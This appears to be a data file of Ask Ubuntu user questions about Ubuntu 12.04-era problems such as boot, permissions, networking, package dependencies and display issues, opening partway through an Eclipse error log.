( workbenchadvisor.java:803 ) at org.eclipse.ui.internal.workbench $ 33.runwithexception ( workbench.java:1595 ) at org.eclipse.ui.internal.startupthreading $ startuprunnable.run ( startupthreading.java:31 ) at org.eclipse.swt.widgets.runnablelock.run ( runnablelock.java:35 ) at org.eclipse.swt.widgets.synchronizer.runasyncmessages ( synchronizer.java:135 ) at org.eclipse.swt.widgets.display.runasyncmessages ( display.java:4140 ) at org.eclipse.swt.widgets.display.readanddispatch ( display.java:3757 ) at org.eclipse.ui.internal.workbench.runui ( workbench.java:2604 ) at org.eclipse.ui.internal.workbench.access $ 4 ( workbench.java:2494 ) at org.eclipse.ui.internal.workbench $ 7.run ( workbench.java:674 ) at org.eclipse.core.databinding.observable.realm.runwithdefault ( realm.java:332 ) at org.eclipse.ui.internal.workbench.createandrunworkbench ( workbench.java:667 ) at org.eclipse.ui.platformui.createandrunworkbench ( platformui.java:149 ) at org.eclipse.ui.internal.ide.application.ideapplication.start ( ideapplication.java:123 ) at org.eclipse.equinox.internal.app.eclipseapphandle.run ( eclipseapphandle.java:196 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.runapplication ( eclipseapplauncher.java:110 ) at org.eclipse.core.runtime.internal.adaptor.eclipseapplauncher.start ( eclipseapplauncher.java:79 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:344 ) at org.eclipse.core.runtime.adaptor.eclipsestarter.run ( eclipsestarter.java:179 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( unknown source ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( unknown source ) at java.lang.reflect.method.invoke ( unknown source ) at org.eclipse.equinox.launcher.main.invokeframework ( main.java:622 ) at org.eclipse.equinox.launcher.main.basicrun ( main.java:577 ) at org.eclipse.equinox.launcher.main.run ( main.java:1410 ) ! entry org.eclipse.equinox.p2.operations 4 0 2011-07-27 00:15:28.049 ! message operation details ! subentry 1 org.eclipse.equinox.p2.director 4 1 2011-07-27 00:15:28.049 ! message can not complete the install because some dependencies are not satisfiable ! subentry 2 org.eclipse.equinox.p2.director 4 0 2011-07-27 00:15:28.049 ! message org.eclipse.linuxtools.callgraph.feature.group [ 0.0.2.201106060936 ] can not be installed in this environment because its filter is not applicable . ! entry org.eclipse.equinox.p2.operations 4 0 2011-07-27 00:15:28.644 ! message operation details ! subentry 1 org.eclipse.equinox.p2.director 4 1 2011-07-27 00:15:28.644 ! message can not complete the install because some dependencies are not satisfiable ! subentry 2 org.eclipse.equinox.p2.director 4 0 2011-07-27 00:15:28.644 ! message org.eclipse.linuxtools.callgraph.feature.group [ 0.0.2.201106060936 ] can not be installed in this environment because its filter is not applicable . ! entry org.eclipse.equinox.p2.operations 4 0 2011-07-27 00:27:35.152 ! message operation details ! subentry 1 org.eclipse.equinox.p2.director 4 1 2011-07-27 00:27:35.158 ! message can not complete the install because some dependencies are not satisfiable ! subentry 2 org.eclipse.equinox.p2.director 4 0 2011-07-27 00:27:35.159 ! message org.eclipse.linuxtools.callgraph.feature.group [ 0.0.2.201106060936 ] can not be installed in this environment because its filter is not applicable . ! entry org.eclipse.equinox.p2.operations 4 0 2011-07-27 00:27:35.215 ! message operation details ! subentry 1 org.eclipse.equinox.p2.director 4 1 2011-07-27 00:27:35.216 ! message can not complete the install because some dependencies are not satisfiable ! subentry 2 org.eclipse.equinox.p2.director 4 0 2011-07-27 00:27:35.216 ! message org.eclipse.linuxtools.callgraph.feature.group [ 0.0.2.201106060936 ] can not be installed in this environment because its filter is not applicable . ! entry org.eclipse.equinox.p2.operations 4 0 2011-07-27 01:07:17.988 ! message operation details ! subentry 1 org.eclipse.equinox.p2.director 4 1 2011-07-27 01:07:18.006 ! message can not complete the install because some dependencies are not satisfiable ! subentry 2 org.eclipse.equinox.p2.director 4 0 2011-07-27 01:07:18.006 ! message org.eclipse.linuxtools.callgraph.feature.group [ 0.0.2.201106060936 ] can not be installed in this environment because its filter is not applicable . ! entry org.eclipse.equinox.p2.operations 4 0 2011-07-27 01:07:19.847 ! message operation details ! subentry 1 org.eclipse.equinox.p2.director 4 1 2011-07-27 01:07:19.848 ! message can not complete the install because some dependencies are not satisfiable ! subentry 2 org.eclipse.equinox.p2.director 4 0 2011-07-27 01:07:19.848 ! message org.eclipse.linuxtools.callgraph.feature.group [ 0.0.2.201106060936 ] can not be installed in this environment because its filter is not applicable . i do n't understand how the path windows like has appeared ... if anyone knows how to solve this , i 'll appreciate ! thank you for all your answers ! best regards , alexandre ferreira .
193896	can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs )	i downloaded 12.04.1 and md5 sum checked them and everything is good . made a live usb and booted up ... just gets to where its about to start with the purple ubuntu loading screen then it goes back to text and gives this message : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) mount : mounting /dev/loop0 on ///filesystem.squashfs failed : input/output error can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem.squashfs this happens in the live option , or persistent even the file checking one does n't work also i 've tried a few different f6 options to no avail . i used 'lili usb creator ' and 'unetbootin ' and also 'universal usb installer , ' all with the same results . i 've also tried using a vm and it showed the same . that is when i figured i had a corrupt .iso so i downloaded it again checked the md5 : e235b63c02644e219b7bf3668f479c9e . only i 'm having the same problem . i 'm just about ready to give up on 12.04.1 and just go back to 10.04 utill the next lts comes out . i 've got a dell mini 10 btw . thanks for your time .
193898	preserve permission switch not working with cp ?	copying file from other user 's directory with '-p ' switch should reserve the permission as per the man page . i am copying /etc/passwd to my home directory with -p switch but the permissions are n't preserved as follows : - ijoin @ stream : ~ $ ls -l /etc/passwd -rw-r -- r -- 1 root root 1813 sep 25 08:58 /etc/passwd ijoin @ stream : ~ $ cp -- preserve /etc/passwd . ijoin @ stream : ~ $ ls -l passwd -rw-r -- r -- 1 ijoin ijoin 1813 sep 25 08:58 passwd i am doing something wrong ?
193903	mounting cifs share appears to work , but then prevents writing after a few seconds	i 've got a nas that is setup with cifs and open guest access . i mounted it in fstab with the following line //192.168.0.101/stor1 /media/freenasbox cifs guest , rw , **noperm** , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 which appears to work great . i 've got read/write access . however , i start up transmission and try to download to /media/freenasbox and it appears to successfully download a file for a few seconds , then gives me error : permission denied also , when i try to create a folder/file in /media/freenasbox , nautilus shows it with a padlock over it , but i can still delete it . can anyone tell me what 's going on ?
193904	white screens when switching to application	sometimes when i alt-tab between applications , the application will just be a white screen . this has happened with terminal and with firefox . i can fix the problem and get the program to render by maximizing or minimizing it . i am using unity-3d and my graphics cards is a geforce gtx 460 . any ideas ? thanks .
193906	user config to limit application access	i want to ubuntu 12.04 lts in a work/office environment . the requirements are : as a desktop/workstation . i need 1 admin user of type administrator , with accessed to all apps , and the normal ability to install new apps . followed by 1 or more standard users . initially the standards users will/must be confined to one email application ( thunderbird ) only . no web , or anything else . so the problem with unity is `` dash home '' , by simply pressing the `` dash home '' button the standard user can find and run ( for example ) the web browser , and any other app . i give ubuntu an a+ for easy access , but that is the problem . so , i could put the administrative user into a new group , that is allow to run apps , chown all apps to that group , chmod apps so only this group can execute them , lots of on going work to maintain . always the possibility of missing an app or two . if i could just get rid of the `` dash home '' button for all standard users , and remove all default apps from the launcher for each standard user . any suggestions ?
193907	how to install trinity on 12.04 ?	i want to install trinity ( the fork of kde 3.x ) on ubuntu 12.04 . i tried adding the ppa and doing sudo apt-get install kubuntu-default-settings-trinity kubuntu-desktop-trinity , but i got an error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : kubuntu-desktop-trinity : depends : ark-trinity but it is not going to be installed depends : kcontrol-trinity but it is not going to be installed depends : kcron-trinity but it is not going to be installed depends : tde-style-qtcurve-trinity but it is not going to be installed depends : tde-systemsettings-trinity but it is not going to be installed depends : tdeadmin-kfile-plugins-trinity but it is not going to be installed depends : tdebase-kio-plugins-trinity but it is not going to be installed depends : tdegraphics-kfile-plugins-trinity but it is not going to be installed depends : tdemultimedia-kfile-plugins-trinity but it is not going to be installed depends : tdemultimedia-kio-plugins-trinity but it is not going to be installed depends : tdenetwork-filesharing-trinity but it is not going to be installed depends : tdenetwork-kfile-plugins-trinity but it is not going to be installed depends : kdepasswd-trinity but it is not going to be installed depends : tdeprint-trinity but it is not going to be installed depends : kdesktop-trinity but it is not going to be installed depends : tdm-trinity but it is not going to be installed depends : kdnssd-trinity but it is not going to be installed depends : kghostview-trinity but it is not going to be installed depends : khelpcenter-trinity but it is not going to be installed depends : kicker-trinity but it is not going to be installed depends : kio-locate-trinity but it is not going to be installed depends : kmenuedit-trinity but it is not going to be installed depends : kmix-trinity but it is not going to be installed depends : knetworkconf-trinity but it is not going to be installed depends : konq-plugins-trinity but it is not going to be installed depends : konsole-trinity but it is not going to be installed depends : kpdf-trinity but it is not going to be installed depends : ksmserver-trinity but it is not going to be installed depends : ksnapshot-trinity but it is not going to be installed depends : ksvg-trinity but it is not going to be installed depends : ksystemlog-trinity but it is not going to be installed depends : twin-trinity but it is not going to be installed depends : twin-style-crystal-trinity but it is not going to be installed depends : libarts1-akode-trinity but it is not going to be installed depends : ksplash-engine-moodin-trinity but it is not going to be installed depends : sudo-trinity but it is not installable depends : qca-tls but it is not installable depends : kdbusnotification-trinity but it is not going to be installed depends : gtk-qt-engine-trinity but it is not going to be installed depends : qt4-tqt-theme-engine but it is not going to be installed recommends : kio-apt-trinity but it is not going to be installed recommends : tde-guidance-powermanager-trinity but it is not going to be installed recommends : adept-trinity but it is not going to be installed recommends : akregator-trinity but it is not going to be installed recommends : amarok-trinity but it is not going to be installed recommends : bluez-utils but it is not going to be installed recommends : bogofilter but it is not going to be installed recommends : cdparanoia but it is not going to be installed recommends : cdrdao but it is not going to be installed recommends : cups-pdf but it is not going to be installed recommends : desktop-effects-tde-trinity but it is not going to be installed recommends : digikam-trinity but it is not going to be installed recommends : foo2zjs but it is not going to be installed recommends : foomatic-db-gutenprint but it is not going to be installed recommends : gwenview-trinity but it is not going to be installed recommends : hpijs-ppds but it is not going to be installed recommends : ijsgutenprint but it is not going to be installed recommends : k3b-trinity but it is not going to be installed recommends : kaddressbook-trinity but it is not going to be installed recommends : kaffeine-trinity but it is not going to be installed recommends : kamera-trinity but it is not going to be installed recommends : karm-trinity but it is not going to be installed recommends : katapult-trinity but it is not going to be installed recommends : kate-trinity but it is not going to be installed recommends : kbstate-trinity but it is not going to be installed recommends : tdepim-kio-plugins-trinity but it is not going to be installed recommends : tdepim-wizards-trinity but it is not going to be installed recommends : tdesudo-trinity but it is not going to be installed recommends : keep-trinity but it is not going to be installed recommends : kfind-trinity but it is not going to be installed recommends : kio-umountwrapper-trinity but it is not going to be installed recommends : kipi-plugins-trinity but it is not going to be installed recommends : klipper-trinity but it is not going to be installed recommends : kmag-trinity but it is not going to be installed recommends : kmail-trinity but it is not going to be installed recommends : kmailcvt-trinity but it is not going to be installed recommends : kmilo-trinity but it is not going to be installed recommends : kmousetool-trinity but it is not going to be installed recommends : kmplayer-konq-plugins-trinity but it is not going to be installed recommends : knotes-trinity but it is not going to be installed recommends : konqueror-trinity but it is not going to be installed recommends : konqueror-nsplugins-trinity but it is not going to be installed recommends : kontact-trinity but it is not going to be installed recommends : konversation-trinity but it is not going to be installed recommends : kooka-trinity but it is not going to be installed recommends : kopete-trinity but it is not going to be installed recommends : korganizer-trinity but it is not going to be installed recommends : kpf-trinity but it is not going to be installed recommends : kppp-trinity but it is not going to be installed recommends : krdc-trinity but it is not going to be installed recommends : krfb-trinity but it is not going to be installed recommends : kscreensaver-trinity but it is not going to be installed recommends : ksysguard-trinity but it is not going to be installed recommends : ktorrent-trinity but it is not going to be installed recommends : kubuntu-docs-trinity but it is not installable recommends : kubuntu-konqueror-shortcuts-trinity but it is not installable recommends : kvkbd-trinity but it is not going to be installed recommends : kwalletmanager-trinity but it is not going to be installed recommends : landscape-client but it is not going to be installed recommends : min12xxw but it is not going to be installed recommends : networkstatus-trinity but it is not installable recommends : openoffice.org-calc but it is not going to be installed recommends : openoffice.org-impress but it is not going to be installed recommends : openoffice.org-trinity but it is not installable recommends : openoffice.org-writer but it is not going to be installed recommends : pinentry-qt recommends : powernowd but it is not installable recommends : pxljr but it is not going to be installed recommends : rdesktop but it is not going to be installed recommends : scim-bridge-agent but it is not going to be installed recommends : scim-bridge-client-qt but it is not going to be installed recommends : scim-qtimm but it is not installable recommends : skim but it is not installable recommends : speedcrunch but it is not going to be installed recommends : splix but it is not going to be installed recommends : strigi-daemon but it is not going to be installed recommends : system-config-printer-tde-trinity but it is not installable recommends : ttf-arabeyes recommends : ttf-arphic-ukai recommends : ttf-arphic-uming recommends : ttf-kochi-gothic recommends : ttf-kochi-mincho recommends : ttf-lao but it is not going to be installed recommends : ttf-malayalam-fonts but it is not going to be installed recommends : ttf-thai-tlwg but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : wvdial but it is not going to be installed recommends : plymouth-theme-kubuntu-logo-trinity but it is not installable e : unable to correct problems , you have held broken packages . i do n't get step 5 back on the ppa 's overview page , look for the signing key heading . you 'll see something like : 1024r/72d340a3 ( what is this ? ) copy the portion after the slash but not including the help link ; e.g . just 72d340a3 here is the link if you want to help me : https : //quickbuild.pearsoncomputing.net/~trinity/+archive/trinity-nightly-builds/
193909	how do i advanced install ubuntu ?	i am new to ubuntu and linux in general . i was wondering if anyone can help me or can point me in the right direction on how to do the following : 1 . ) customize a fresh clean install of ubuntu 12.04 lts on to my hard drive . 2 . ) i have 2x120gig ssd hard drives , i want one of those hard drives to be partitioned into sda1 where the core ubuntu files will be located ( about 10 gigs ) and then sda2 where some 12 gigs will be dedicated to swapping and the rest would utilities like video players , system tools and such 3 . ) the other hard drive will be dedicated to person files and programs ( ie gaming ) . i am not sure if i should also create a swap partition for this drive , any suggestions ? everytime i try to re-install and partition according to the above failed because of a `` missing root file '' or something to that effect , so far i had no luck understanding all the mount points either . if anyone can help me do this , i will be extremely thrilled !
193914	login takes ages after upgrade to xfce 4.10	i updated my xubuntu to xfce 4.10 . after that my first login after reboot takes up to several minutes . how do i find out the culprit ?
193918	myanmar font on firefox at ubuntu did n't work out	i am a new user of ubuntu 12.04 from myanmar . i tried to install myanmar font to read the myanmar website but it did n't work out . please someone can help me out ?
193930	how to disable sleep/screensaver kubuntu 12.04 lts and vlc ?	i watch vlc for a while , then about 15 min . later , it sleeps . where can i find the how to disable the screen-saver or how to disable sleep ?
193938	directory permission	i am running 12.04 x64 server on ext4 disk . there are two user groups 'a ' and 'b ' . for a specific directory , i would like to give its all permissions to user group 'a ' . also i would like to give only 'write ' permission to user group 'b ' . a user of 'b ' should only be allowed to write a file or create directory in the directory . ( should not be allowed to open or read a file . ) i tried with acl as below but not worked well . sudo setfacl -d -m g : groupb : -wx /mydirectory result : the user of groupb could not entered 'mydirectory ' because of permission denied error . does anyone know if it is possible ? thank you !
193946	how to fix a computer that wo n't restart ?	i ca n't restart my laptop under ubuntu 12.04 and the screen turns black with no response after clicking the restart button . how do i fix it ?
193954	coding own applicaion for gnome-shell calendar	1 ) i 'm looking to write a calendar application in python that will interact with gnome-shell-calendar . i 've asked around , and i was told that the gnome-shell calendar uses evolution-data-sever to get its informaion . i found out that there is a python module python-evolution that allows you to interact with the evolution server . but , that module has now been depreciated . is there another way to interact with the sever ? 2 ) i 've also noticed a process called gnome-shell-calendar-server what 's the difference between that and the evolution one ?
193958	how can i uninstall vmware 8 workstation from ubuntu studio 12.04.1 lts ?	i have tried a few things already but i still ca n't seem to uninstall it . the last thing i tried was this code : vmware-installer -- uninstall-product vmware-workstation and that did n't work for me . i even tried it as root and got this message : vmware-installer : command not found . if anyone has other ideas please let me know i 'd appreciate it .
193967	strange behaviour when minimizing virtualbox in fullscreen mode	i have the same problem like mentioned in this thread . http : //ubuntuforums.org/showthread.php ? p=12257698 when virtualbox is running in fullscreen mode , and i 'll minimize it to go back to unity , the only visible elements are the wallpaper and the background shadow of the upper bar . if then i click on virtualbox main window return all normal . i want to report a bug , but i do n't know if is unity or virtualbox issue . thanks in advance ! i think it exists since unity update yesterday ( or day before yesterday ) . any ideas ? if you need more information tell me please . i use ubuntu 12.04 host an win7 guest . graphics : intel速 sandybridge mobile
193969	use internet from 2 different sources at the same time	i have an evdo usb and wifi , i want to use them simultaneously . say , for example , use evdo for my torrent client and wifi for browsing . both are connected and ubuntu uses wifi by default , swithces to evdo when i disconnect wifi . p.s . i have tried using the network interface option in deluge but it does n't help .
193970	how to install illustrator cs6 on precise ?	i am trying to install illustrator cs 6 on 12.04 . i know it is possible , because there are some screenshots and movies over internet showing that some of people succeeded . however i did not . i am willing to use even crossover if necessary . any help would be appreciated .
193971	12.10 live dvd with no video input	i have been trying install ubuntu 12.10 , but as soon as it gets past my bios and to the screen with the blinking line in the top left , i get a no video input message on my tv ( like when you turn the tv on with nothing connected ) . i have used live dvds of both betas , alphas , and the daily build all with exactly the same results . has any one else had this ? is there a fix ? does this mean i can never upgrade my ubuntu again ? ( 12.04 works . i 've been using it since beta . ) my pc , while old , should run this fine . cpu : 2x intel p4 ht @ 3ghz gpu : nvidia geforce 310 via hdmi ram : 2 gb ddr 2 hdd : 2 x 7200 rpm sata please help me . i use ubuntu exclusively on my pc and would like to keep doing so .
193973	internet connectivity indicator on unity	how can i check whether my internet connection is active on ubuntu . if i am connected to a wired or wi-fi network , the indicator applet shows that i 'm connected . but there is now way to find out the internet is working or not . i have some problem in my internet connectivity and i frequently lose my connection . i found this link is useful internet connectivity indicator applet but i do n't know that where should i use this code ! # ! /bin/bash if ping -c 1 -w 2 google.com > /dev/null ; then echo `` up '' else echo `` down '' fi
193985	strange problem with libc : undefined reference to `crypt '	i moved from archlinux to kubuntu 12.04 yesterday . i compiled buildroot 2012.08 on archlinux without any problem . though on kubuntu libcrypt seems to be broken . sysvinit ca n't find it anywhere . glibc-dev and all dependencies are installed . how do i link to libcrypt ? or , which package containts that library ? ... bc-gcc sulogin.o -o sulogin sulogin.o : in function `main ' : sulogin.c : ( .text+0x49d ) : undefined reference to `crypt' collect2 : ld returned 1 exit status
193987	how to remove recent item bookmark from gnome shell standard `` save windows ''	i search all around the internet till the 6th page of result on google with very precise search , but i ca n't figure how i can do that . i 'm working with last updated ubuntu 12.04 and gnome shell , and i wonder how i can remove and i say remove not clear or avoid feeding but remove completly the `` recent item '' bookmark you can see in the standard save windows of gnome shell here 's a picture ( in french it 's `` răšcemment utilisăšs '' ) : sorry not enought point to post image to see what i talk about , just do that : -open gedit -type anything -save your file -now that windows got a `` recent item '' and i want it down i can not reward point , but i would if i could for the guy finding a solution , and a bonus point if you find a way to remove it every where it appears in gnome shell . thank you for time . antoine
193989	not able to login to administrator account in 12.04	i 'm using 12.04 . it was working fine till now . suddenly today it happened to stuck/hang . i was writing python scripts which went in infinite loop . so i restarted my pc and was unable to login to admin account . i 'm writing this , unfortunately , from my guest account . i tried many questions but none of them solved my problem . tried sudo rm ~/.xauthority from single user mode , but it says no such file or directory even when i 'm in my home directory edited /etc/lightdm/lightdm.conf to enable manual login . this did n't work either . [ edit ] i tried using gdm . when i logged in my administrator account , it said could not update .iceauthority
193990	specify initial geometry for any window with gnome 3	i would like to open one or more nautilus windows from the command line or a script at certain positions on my screen/desktop while in gnome 3 . i could do this in ubuntu 11.10 by specifying the geometry . for example , to open the window at the bottom right corner from the command line i could use : nautilus -- geometry 600x475-0-0 ~/mystuff however , in ubuntu 12.04 using gnome 3 the geometry option is ignored or overridden . is there a way to arbitrarily position the nautilus ( or any application ) windows when starting them from command line or scripts ?
193991	how know if migrate wubi to partition is successful	i run this script https : //help.ubuntu.com/community/migratewubi and reveiced a message : found ubuntu 12.04.1 lts ( 12.04 ) on /dev/sda7 ... migration completed successfully . then i restarted computer and choose ubuntu from 2 lines windows ubuntu . but i do n't see what changed , if i am on a partition with ubuntu or wubi . @ ubuntu : ~/sudo fdisk -l /dev/sda1 * 63 167782859 83891398+ 7 hpfs/ntfs/exfat /dev/sda2 167782860 976768064 404492602+ 5 extended /dev/sda5 167782923 284337032 58277055 7 hpfs/ntfs/exfat /dev/sda6 587224008 669566016 41171004+ 7 hpfs/ntfs/exfat /dev/sda7 284340224 587223039 151441408 83 linux /dev/sda8 669569024 710529023 20480000 82 linux swap / solaris edit : i download proposed pack from issue 1 .
193995	current status of support , on 12.10 quantal , for intel optimus ?	which is the current status of the support , on 12.10 , for intel optimus ? i 've seen lots of talk around , but how does it translate into practical support ? i have a thinkpad w520 , which has the vga output hardwired to the nvidia card , and a bios option for switching the two cards . i was hoping to be able to enable the nvidia card and use the vga output ( and viceversa , disable it and use the laptop screen ) without restarting the machine .
193998	can not boot from k/ubuntu install disk on my uefi system	i just got a new system and have been trying to get it set up w/ win7 & kubuntu dual-boot , but i 've got a major problem . the bios of my motherboard ( an asus crosshair 990fx ) is strictly uefi -- there is no legacy support mode available . i 've been reading up on how to get kubuntu installed in uefi mode but no matter what i try i can not seem to even boot into my install cd/usb key properly . i can get as far as the selection screen ( `` try kubuntu '' , `` install kubuntu '' ... ) but this screen starts off not appearing correctly . if i try moving the cursor around it sometimes seems to correct itself and show me my choices . but once i select `` try kubuntu '' it starts loading , the screen goes black and then proceeds to flicker -- about once every 5-10 seconds or so . this continues indefinitely . i 've tried this with both kubuntu & ubuntu installation media , even the amd64+mac ubuntu variety that is supposed to be a lot more flexible w.r.t . uefi . the only hint i 've had that the system might have booted correctly is a little drum sound that plays when booting from the ubuntu install disk . well , that and the fact that when i hit my system 's power button it seems to shut down correctly , even ejecting the cd at the end . this might be a video driver issue ; my system has two nvidia 550 's , one of which is attached to my primary monitor . ( the secondary is n't hooked up yet . ) i 'll keep looking over similar questions but any advice would be greatly appreciated . update : i 've tried booting into my 12.04 install cd twice now , each time using two different options supplied by my bios . one seemed to offer the ability to boot into my cd under uefi mode -- this did n't even produce the initial boot menu . the other method offers the ability to boot into my cd not under uefi mode . this does produce the boot menu , but after this point it seems i still can not get to a proper video mode to see what 's going on .
193999	how can i use work-space edge settings on gnome-classic	i am using ubuntu 12.04 with gnome-classic and i need to configure work-space edge settings . in unity it can be easily done by ubuntu tweak tool ... this is what i had in unity when hovering bottom left-shows desktop , bottom right-windows , top right-workspaces but there is no such setting in ubuntu tweak in gnome-classic , how to enable workspace edges ?
194001	remove panel shadow in kde 4.8+	it seems that panel shadow is somehow hardcoded in kde 4 and devs do not have any plans to change it and/or make it customizable . so , what i 'm actually asking is some kind of hack ( if there is any ) which will remove the shadow of the panel in kde 4.x completely ( but without need to disable all desktop effects in the process ) . possible application : when a user wants a completely transparent panel , no top/bottom borders at all , the shadow is completely out of place and destroys the experience .
194005	how do i get the root account ?	i want to get `` root '' account and i want to be root ! but this 12.04 used a tile @ start screen . unlike the older one using type account , tile not type , and it is the weakness ! so i ca n't find `` root '' . please help me to root this my ubuntu .
194006	how can i uninstall unity-2d	i want to completely remove unity-2d ( not unity ) on ubuntu precise pangolin 12.04 . i used dpkg -l | grep unity-2d to list the packages which belongs to unity-2d . the result was this : ii libunity-2d-private0 5.12.0-0ubuntu1.1 unity 2d shared library ii unity-2d 5.12.0-0ubuntu1.1 unity interface for non-accelerated graphics cards ii unity-2d-common 5.12.0-0ubuntu1.1 unity 2d panel ii unity-2d-shell 5.12.0-0ubuntu1.1 dash and launcher for the unity 2d environment ii unity-2d-spread 5.12.0-0ubuntu1.1 unity 2d spread now i want to remove those packages with : sudo apt-get purge unity-2d unity-2d-common unity-2d-panel unity-2d-shell unity-2d-spread libunity-2d-private0 then i get a the following message : the following packages will be removed : libunity-2d-private0* ubuntu-desktop* unity-2d* unity-2d-common* unity-2d-panel* unity-2d-shell* unity-2d-spread* which means that the package ubuntu-desktop should also removed . but the decription from that package apt-cache show ubuntu-desktop says : description-en : the ubuntu desktop system this package depends on all of the packages in the ubuntu desktop system . it is also used to help ensure proper upgrades , so it is recommended that it not be removed . that it should not be removed , because it is needed to ensure a successful system-update . how can i remove unity-2d without removing ubuntu-desktop ?
194010	computer ( amd64 turion processor ) not booting after instalition	i have a machine running windows 7 , and a laptop with a amd 64 - turion processor running vista . so i tried to install ubuntu on the laptop with vista , runned the intalation cd after booting , everything went ok , i selected the option to install ubuntu and delete windows ... selected everything , and during the instalation process the computer stalled ... screen went black and everything stoped , then shutdown ... when i turned on the computer again , it had no os on it ... neither one ... then i tried to reboot it with the cd again , he loaded but couldnt run the instalation again . can i try again instaling with the cd ( in some way ) or did the pc go to heaven ?
194011	monitor resolution problems after last update	i do n't know if there is already a question like that but after my last update ( update manager ) when i logged in ubuntu my resolution was set to 1024/768 and there is no option at displays to change it to another.when i use the command - > sudo apt-get install nvidia-current the output at terminal is that : sudo apt-get install nvidia-current reading package lists ... done building dependency tree reading state information ... done nvidia-current is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . i am noob with ubuntu and i would like some help to fix this problem . thanks in advance for your help
194026	wireless switch on dell xt2 - strange behaviour of rfkill	i have an dell latitude xt2 using an intel wlan card ( lspci lists it as `` intel corporation ultimate n wifi link 5300 '' ) running lubuntu 12.04 with recent updates . the laptop has a hardware wlan switch . i have problems activating the wlan when booting with the hardware switch set to `` off '' . the situation is a bit confusing , unfortunately . rfkill lists two wlan devices ( though lspci only shows the intel one ) . this is the situation when booting with the hardware switch set to `` off '' : 0 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes 1 : dell-bluetooth : bluetooth soft blocked : yes hard blocked : yes 2 : phy0 : wireless lan soft blocked : yes hard blocked : yes from some tests , i conclude wlan is only activated when both , the dell-wifi and phy0 , are unblocked by soft- and hardware . but i can only unblock dell-wifi after the hardware switch is set to `` on '' . procedure right from boot with hardware switch set to `` off '' : soft-unblocking phy0 works as expected . could be done by start-up script . sudo rfkill unblock 0 : nothing happens . soft block of dell-wifi not removed . set the hardware switch to `` on '' : phy0 gets its hard block removed . still no wlan . sudo rfkill unblock 0 : both the soft and hard lock of dell-wifi are removed . wlan is now active and works . sudo rfkill block 0 : only adds the soft block as expected . wlan goes off again . so , in order to activate wlan , i have to use the hardware switch and afterwards ( manually ) run a script - that 's a bit inconvenient . does someone know a better solution ? maybe a daemon could help that listens to rfkill events to unblock dell-wifi after i have set the hardware switch to `` on '' ? ( sounds like another workaround ) when booting with the hardware switch set to `` on '' , nothing is blocked neither hard nor soft .
194027	locking with usb drive	when i use windows , there is a program i use called predator that locks my pc when i remove a certain usb flash drive . it then unlocks the computer when i reinsert it . is there any program like this for ubuntu ?
194029	changes in /etc/network/interfaces do not make any change	i config static ip in /etc/network/interfaces $ cat /etc/network/interfaces # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 # iface eth0 inet dhcp iface eth0 inet static address 192.168.1.121 netmask 255.255.255.0 gateway 192.168.1.1 and restart eth0 interface $ sudo ifconfig eth0 down $ sudo ifconfig eth0 up but the eth0 interface does n't change . $ ifconfig -a eth0 link encap : ethernet hwaddr 90 : e6 : ba:22:6a : f2 inet addr:192.168.1.104 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :92e6 : baff : fe22:6af2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7908 errors:0 dropped:0 overruns:0 frame:0 tx packets:10112 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5452712 ( 5.4 mb ) tx bytes:1534077 ( 1.5 mb ) interrupt:46 base address:0x4000
194033	starting glassfish on ubuntu 12.04	i have installed glassfish in ubuntu 12.04 from below : ( the first one ) http : //glassfish.java.net/public/downloadsindex.html # top i have user-admin and password-admin for administrator and installation directory is root/glassfish after installing it started the deafult domain automatically so i see the admin login page when i type `` http : //localhost:4848/ '' in the browser . i am able to login also with above user and password . in the quick-start guide it says following to start the server as-install/bin/asadmin start-domain to stop : as-install/bin/asadmin stop-domain i tried to start and stop to glassfish like that . 1 ) i moved to usr/local/glassfish3.1.2.2/bin directory and then i type folllowing : asadmin start-domain but it gives me following : no command 'asadmin ' found , did you mean : command 'amadmin ' from package 'amanda-server ' ( universe ) asadmin : command not found i get same when i try to stop it by as-admin stop-domain **may be i have misunderstood the instructions to start and stop the server . could someone please tell me what am i doing wrong here ? **
194036	migrate rhythbox from one computer to another with different username	i want to migrate rhythmbox from one computer to another . i have different usernames in both the computers . i will need to carry music files , covers , playcounts , ratings , playlists , etc . merely copying music files and .local/share/rhythmbox does not work ( i guess because music locations are different on both the computers ) . what is the best way to achieve this ? i will at least like to carry ratings and playlists .
194039	no terminal colors in ubuntu server 12.04	i 've tried everything from this duplicate question but i still ca n't get it to work . the only difference from that question is that when i run env | grep term i get term=xterm instead of term=xterm-color . i dont think it matters though , they seem to be pretty interchangeable . what i do n't understand however is that the only thing that has disappeared is the colors in the actual prompt . for example , if i run nano and it detects the syntax of the file , for example if it 's a script , i get colors . also when i run the env command mentioned earlier , the actual term text is red . so the colors are obviously working , it 's just that i do n't get colored folders , executable files and so on anymore . i think it also might have occured in connection to installing ruby/rvm . i 've tried replacing .bashrc . ( edit however , when creating a new user , that user has working colors ) i suppose this has a pretty simple solution but i 'm just so sick of googling this now that i 'd really appreciate som info on how the coloring settings works in the terminal and how this could happen . thanks !
194041	how can i install a package on ubuntu if i have no internet access ?	i have no access to the internet on my computer and am trying to install all my required software through another computer . i have downloaded the deb file for gfortran version 4.5 , and now i am looking for options to install the same on the computer which has ubuntu 12.04 .
